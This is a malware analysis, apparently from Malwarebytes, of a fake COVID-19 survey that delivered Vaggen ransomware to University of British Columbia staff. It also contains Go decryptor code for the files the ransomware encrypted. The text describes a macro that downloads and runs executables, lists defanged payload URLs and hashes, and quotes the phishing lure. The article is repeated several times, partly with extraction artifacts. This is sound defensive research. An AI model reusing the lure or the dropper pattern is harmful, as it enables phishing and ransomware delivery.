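func sealVaggen(key, nonce, plaintext []byte) ([]byte, error) {
	if len(nonce) != nonceSize {
		return nil, fmt.Errorf("nonce must be %d bytes, got %d", nonceSize, len(nonce))
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, nonceSize, nonceSize+len(plaintext)+tagSize)
	copy(out, nonce)
	return gcm.Seal(out, nonce, plaintext, nil), nil // Seal appends ciphertext||tag to out
}

// openVaggen splits nonce || ciphertext || tag and decrypts. GCM verifies the tag,
// so a truncated or tampered file, or one from a build with another key, is rejected
// instead of being decrypted to garbage.
func openVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, fmt.Errorf("file too short (%d bytes) to hold a nonce and a GCM tag", len(blob))
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// recoverTree is the inverse of the malware's filepath.Walk callback: every *.VAGGEN file
// under root is decrypted next to itself without the extension. Encrypted originals stay.
func recoverTree(root string, key []byte) (int, error) {
	n := 0
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return err
		}
		if d.IsDir() || !strings.HasSuffix(path, extension) {
			return nil
		}
		blob, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		plain, err := openVaggen(key, blob)
		if err != nil {
			return fmt.Errorf("%s: %w", path, err)
		}
		if err := os.WriteFile(strings.TrimSuffix(path, extension), plain, 0o600); err != nil {
			return err
		}
		n++
		return nil
	})
	return n, err
}

func main() {
	dir, err := os.MkdirTemp("", "vaggen-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil { // the malware used CryptGenRandom here
		panic(err)
	}
	blob, _ := sealVaggen(vaggenKey, nonce, []byte("constructed sample: quarterly budget")) // constructed victim content
	_ = os.WriteFile(filepath.Join(dir, "budget.xlsx"+extension), blob, 0o600)
	n, err := recoverTree(dir, vaggenKey)
	plain, _ := os.ReadFile(filepath.Join(dir, "budget.xlsx"))
	fmt.Printf("recovered %d file(s), err=%v, content=%q\n", n, err, plain)
}
```

Point recoverTree at a copy of the affected tree, not the only copy: a wrong key or an unexpected layout surfaces as a per-file error from openVaggen rather than as silently corrupt output, and the .VAGGEN originals remain available for a second attempt.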
The malware uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:

- the 12-byte nonce
- the encrypted content
- the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content: the same key is embedded in every copy of the binary and the nonce is stored in clear at the start of each file, so nothing secret is needed beyond the sample itself.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that use a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 329 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 330 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 331 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 332 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 333 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 334 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.
Vaggen ransomware
After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD, to be paid in Bitcoin.
The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as ‘main_main’.
Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen
A full list of the functions, along with their RVAs, can be found here.
Some of the strings used by the malware (e.g. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.
Encrypting and renaming the files is implemented as the callback of the standard Go library function path/filepath.Walk.
Files are encrypted with AES-256 (32-byte key) in GCM mode.
The encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.
The content of the output file (with .VAGGEN extension) contains:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag
The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.
With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.
Unusually low ransom amount
Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.
However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.
Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.
We are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.
Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
IOCs
Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f
Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp
Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.
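As an added example (not the authors' tooling and not the malware's code), the Go program below parses the .VAGGEN layout the analysis describes, a 12-byte nonce followed by the AES-256-GCM ciphertext and its 16-byte tag, and decrypts it with the hardcoded key quoted above. Because GCM authenticates the ciphertext, a wrong key fails the tag check rather than yielding garbage, so the same function also answers whether a given sample still uses this key. The fixture builder exists only so the decryptor can be exercised offline; its nonce comes from crypto/rand rather than CryptGenRandom, and the file names and plaintext used are constructed.

```go
// Added example, not the Malwarebytes authors' tooling and not the malware's code:
// parse and decrypt the .VAGGEN layout described in the analysis
// (12-byte nonce || AES-256-GCM ciphertext || 16-byte tag) with the hardcoded key.
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"os"
	"strings"
)

const (
	nonceLen = 12 // gcm.Seal's standard nonce size, as the analysis reports
	tagLen   = 16 // GCM tag appended to the ciphertext by gcm.Seal
)

// VaggenKey is the 32-byte key the analysis found hardcoded in the sample.
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key) // rejects keys that are not 16, 24 or 32 bytes
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// DecryptVaggen recovers the plaintext of one encrypted file body. Because GCM
// authenticates the ciphertext, a wrong key fails the tag check instead of
// producing garbage, so the error also answers "does this sample use the same key?".
func DecryptVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceLen+tagLen {
		return nil, errors.New("blob shorter than nonce + tag: not a complete .VAGGEN file")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, body := blob[:nonceLen], blob[nonceLen:]
	// gcm.Open expects ciphertext||tag, which is exactly what follows the nonce.
	return gcm.Open(nil, nonce, body, nil)
}

// RecoveredName strips the .VAGGEN extension to get the original file name.
func RecoveredName(encryptedPath string) string {
	return strings.TrimSuffix(encryptedPath, ".VAGGEN")
}

// DecryptVaggenFile decrypts one file on disk and writes the plaintext next to it.
func DecryptVaggenFile(key []byte, encryptedPath string) (string, error) {
	blob, err := os.ReadFile(encryptedPath)
	if err != nil {
		return "", err
	}
	plain, err := DecryptVaggen(key, blob)
	if err != nil {
		return "", fmt.Errorf("%s: %w", encryptedPath, err)
	}
	out := RecoveredName(encryptedPath)
	return out, os.WriteFile(out, plain, 0o600)
}

// BuildVaggenFixture produces a blob in the same layout so the decryptor can be
// exercised offline. It is a constructed test fixture: the nonce comes from
// crypto/rand here, whereas the sample used CryptGenRandom.
func BuildVaggenFixture(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceLen)
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	sealed := gcm.Seal(nil, nonce, plaintext, nil) // ciphertext || tag
	return append(nonce, sealed...), nil
}

func main() {
	// Constructed demonstration: build a fixture from a throwaway plaintext, then recover it.
	blob, err := BuildVaggenFixture(VaggenKey, []byte("constructed plaintext"))
	if err != nil {
		panic(err)
	}
	plain, err := DecryptVaggen(VaggenKey, blob)
	fmt.Printf("recovered %q, err=%v\n", plain, err)
	// Command-line use: decrypt every .VAGGEN path given as an argument.
	for _, p := range os.Args[1:] {
		if out, err := DecryptVaggenFile(VaggenKey, p); err != nil {
			fmt.Fprintln(os.Stderr, err)
		} else {
			fmt.Println("wrote", out)
		}
	}
}
```

Run it on copies of the encrypted files, not the originals, so an authentication failure (a variant with a different key, or a truncated file) costs nothing; the per-file error from DecryptVaggenFile names the path that did not verify.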
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 343 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 344 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 345 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 346 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 347 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 348 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 349 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 350 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 351 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 352 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
